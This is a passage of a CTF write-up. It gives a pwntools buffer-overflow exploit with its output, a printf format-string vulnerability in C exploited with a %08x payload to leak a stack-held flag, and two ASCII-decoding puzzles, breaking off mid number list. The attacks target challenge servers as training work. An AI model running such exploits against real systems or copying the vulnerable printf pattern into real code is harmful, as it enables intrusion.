<span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>
<span class="kn">import</span> <span class="nn">re</span>
<span class="c1">#p = process('./main')
</span>
<span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s">"206.189.123.169"</span><span class="p">,</span> <span class="mi">5001</span><span class="p">)</span>
<span class="n">output</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">()</span>
<span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="n">output</span><span class="p">)</span>
<span class="n">win_addr</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="s">"0[xX][0-9a-fA-F]+"</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">output</span><span class="p">))</span>
<span class="n">win_addr</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">win_addr</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">base</span><span class="o">=</span><span class="mi">16</span><span class="p">)</span>
<span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="sa">f</span><span class="s">"Win address = </span><span class="si">{</span><span class="n">win_addr</span><span class="si">}</span><span class="s">"</span><span class="p">)</span>
<span class="n">offset</span> <span class="o">=</span> <span class="mi">32</span>
<span class="n">junk</span> <span class="o">=</span> <span class="sa">b</span><span class="s">'A'</span> <span class="o">*</span> <span class="n">offset</span>
<span class="n">payload</span> <span class="o">=</span> <span class="p">[</span><span class="n">junk</span><span class="p">,</span> <span class="n">p32</span><span class="p">(</span><span class="n">win_addr</span><span class="p">)]</span>
<span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s">""</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>
<span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>
<span class="n">p</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span>
</code></pre></div></div>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>python3 exp.py
<span class="o">[</span>+] Opening connection to 206.189.123.169 on port 5001: Done
<span class="o">[</span><span class="k">*</span><span class="o">]</span> There is a secret at: 0x5662620d
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Win address <span class="o">=</span> 1449288205
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Switching to interactive mode
What is your name:
bbV
ltdh21<span class="o">{</span>Y0u_JuST_Pwn3d_Th1s_BaD_Bo1s<span class="o">}</span>
</code></pre></div></div>
<hr />
<h3 id="leak-monster">Leak Monster</h3>
<ul>
<li>Description: Can someone call a plumber?</li>
<li>Solves: 10</li>
</ul>
<p>For this challenge we are provided main.c and a nc session.</p>
<p>main.c:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <stdio.h>
#include <string.h>
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="n">text</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="kt">char</span> <span class="n">flag</span><span class="p">[]</span> <span class="o">=</span> <span class="s">"AAAA"</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Whats your Name Mr plumber: "</span><span class="p">);</span>
<span class="n">fgets</span><span class="p">(</span><span class="n">text</span><span class="p">,</span> <span class="mi">1024</span> <span class="p">,</span> <span class="n">stdin</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Hello there "</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="n">text</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="k">return</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>The source code is a textbook example of how not to use the printf() function. We can exploit this using %x string formatting.</p>
<p>The following input leaks the stack.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>nc 206.189.123.169 5000
Whats your Name Mr plumber: AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.
Hello there AAAA00000400.f7ee1580.5662424b.f7cff4d4.f7ee97c0.f7ee9110.ffd61754.00000009.00000001.f7d0268c.64746cd8.7b313268.336d3053.5f336e6f.4c6c4163.505f415f.424d756c.007d7233.41414141.78383025.
</code></pre></div></div>
<p>The leading AAAA acts as a marker, we find the resulting 41414141 in the stack and look at the preceding bytes. Using cyberchef I swap the endianness and convert from hex to get the flag.</p>
<p><img src="https://jdmce.com/assets/ltdh21/leakflag.jpg" alt="Leak" /></p>
<h2 id="misc">Misc</h2>
<h3 id="oooo-some-latine">oooo some Latine</h3>
<ul>
<li>Description: George indiget aliquo auxilio, non potest se adiuvare vos?</li>
<li>Solves: 23</li>
</ul>
<p>We are given a nc session to join</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>nc 167.99.86.217 9000
._ o o
<span class="se">\_</span><span class="sb">`</span>-<span class="o">)</span>|_
,<span class="s2">""</span> <span class="se">\ </span>
,<span class="s2">" ## | ಠ ಠ.
,"</span> <span class="c">## ,-\__ `.</span>
,<span class="s2">" / </span><span class="sb">`</span><span class="nt">--</span>._<span class="p">;</span><span class="o">)</span>
,<span class="s2">" ## /
,"</span> <span class="c">## /</span>
87 104 97 116 32 105 115 32 116 104 101 32 76 97 116 105 110 32 102 111 114 32 102 108 97 103 63
enter <span class="s2">"exit"</span> to quit
George:
</code></pre></div></div>
<p>The ascii reads:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>What is the Latin for flag?
</code></pre></div></div>
<p>The latin for flag is vexillum. Typing vexillum into the prompt return the ascii values, typing in the asci values returns the flag</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>George: vexillum
vexillum
118 101 120 105 108 108 117 109
87 104 97 116 32 105 115 32 116 104 101 32 76 97 116 105 110 32 102 111 114 32 102 108 97 103 63
enter "exit" to quit
George: 118 101 120 105 108 108 117 109
118 101 120 105 108 108 117 109
You have found the flag! ltdh21{L4t1n_1s_t00_34sy}
87 104 97 116 32 105 115 32 116 104 101 32 76 97 116 105 110 32 102 111 114 32 102 108 97 103 63
enter "exit" to quit
George:
</code></pre></div></div>
<hr />
<h3 id="dont-ascii-me-again">Don’t Ascii Me Again</h3>
<ul>
<li>Description: Stop Ascii me questions!</li>
<li>Solves: 16</li>
</ul>
<p>Again we are given a nc session to connect to. We are given a long list of numbers and told to decode the message to get the flag.</p>
<p>I noticed that typing in a character at the prompt returns 5 numbers, repeating the character changes the numbers, however the numbers always add up to the ascii value of the character</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>: a
57 6 9 22 3
: a
8 31 9 33 16
:
57+6+9+22+3=97=a
</code></pre></div></div>
<p>To decode the message we need to group the numbers into chunks of 5, sum them then convert to text. I wrote the following python script:</p>
<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python3
</span>
<span class="n">nums</span> <span class="o">=</span> <span class="p">[</span><span class="mi">10</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">33</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">69</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">38</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">34</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">31</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="mi">31</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">57</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">34</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="mi">32</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">57</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">62</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">50</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">26</span><span class="p">,</span> <span class="mi">40</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">33</span><span class="p">,</span> <span class="mi">30</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">30</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">39</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">27</span><span class="p">,</span> <span class="mi">46</span><span class="p">,</span> <span class="mi">26</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">74</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">29</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">36</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">35</span><span class="p">,</span> <span class="mi">69</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">60</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">27</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="mi">36</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">50</span><span class="p">,</span> <span class="mi">33</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">62</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">47</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">21</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">22</span><span class="p">,</span> <span class="mi">66</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">45</span><span class="p">,</span> <span class="mi">29</span><span class="p">,</span> <span class="mi">21</span><span class="p">,</span> <span class="mi">31</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">21</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">35</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">27</span><span class="p">,</span> <span class="mi">32</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">66</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="mi">43</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">34</span><span class="p">,</span> <span class="mi">26</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">38</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">49</span><span class="p">,</span> <span class="mi">55</span><span class="p">,</span> <span class="mi">22</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">46</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">29</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">53</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">29</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="mi">35</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">48</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="mi">61</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">55</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">58</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">41</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">48</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="mi">31</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">30</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">56</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="mi">34</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">60</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">69</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">30</span><span class="p">,</span> <span class="mi">30</span><span class="p">,</span> <span class="mi">39</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">54</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">29</span><span class="p">,</span> <span class="mi">42</span><span class="p">,</span> <span class="mi">31</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">49</span><span class="p">,</span> <span class="mi">47</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">39</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">39</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">34</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">36</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">43</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">27</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">78</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">46</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">33</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">31</span><span class="p">,</span> <span class="mi">46</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">52</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">39</span><span class="p">,</span> <span class="mi">22</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">49</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">39</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">36</span><span class="p">,</span> <span class="mi">35</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="mi">47</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">39</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">21</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">47</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">36</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">21</span><span class="p">,</span> <span class="mi">22</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">29</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">40</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">21</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">46</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">32</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">61</span><span class="p">,</span> <span class="mi">43</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="mi">57</span><span class="p">,</span> <span class="mi">34</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">27</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="mi">44</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">57</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">36</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="mi">65</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">53</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="mi">32</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">36</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">44</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">42</span><span class="p">,</span> <span class="mi">51</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">41</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="mi">31</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">38</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">22</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">38</span><span class="p">,</span> <span class="mi">26</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">89</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">43</span><span class="p">,</span> <span class="mi">38</span><span class="p">,</span> <span class="mi">22</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">58</span><span class="p">,</span> <span class="mi">26</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">33</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">31</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="mi">29</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">77</span><span class="p">,</span> <span class="mi">36</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">36</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="mi">75</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">21</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">52</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="mi">58</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">34</span><span class="p">,</span> <span 